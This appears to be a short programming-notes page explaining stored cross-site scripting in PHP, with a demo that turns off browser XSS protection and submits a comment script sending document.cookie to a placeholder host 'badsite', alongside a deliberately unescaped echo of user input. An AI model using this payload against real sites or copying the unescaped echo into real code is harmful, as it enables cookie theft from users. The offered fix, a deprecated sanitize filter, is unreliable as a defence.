PROGRAMMING

 
REMEMBERS




Last update:   29-10-2021

Cross Site Scripting

This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. Browsers have some xss protection, we need to disable it for this test example.
 
<?php header('X-XSS-Protection:0'); ?>

<!-- Logged user data in Cookie -->
<script>
    function setCookie(c_name,value,exdays) {
        var exdate=new Date();
            exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays==null) ? "" : 
                "; expires="+exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }
    setCookie('username', 'john');
    setCookie('email', 'john@yahoo.com'); // Look Here
</script>

<!-- User submit malicious comment -->
<form method="POST">
    Add a comment: 
    <textarea name="comment">
        <script> 
            document.location = 
                "badsite/test.php?cookies="+ document.cookie; 
        </script>
    </textarea>
    <inputt type="submit" name="btn_submit"/>
</form>
... 19 lines
 
Submited comment is displayed
 
if (isset($_POST['btn_submit'])) {
    if (!empty($_POST['comment'])) {
    
        echo $_POST['comment']; // Look Here

        // redirects to:
        // badurl?cookies=username=john&email=john@yahoo.com
        // and expose logged user private data

        // Solution // Look Here
        echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING);
    }
}
... 5 lines
 

Questions    
Spoofed forms

        A B C D E F
🔔
1/2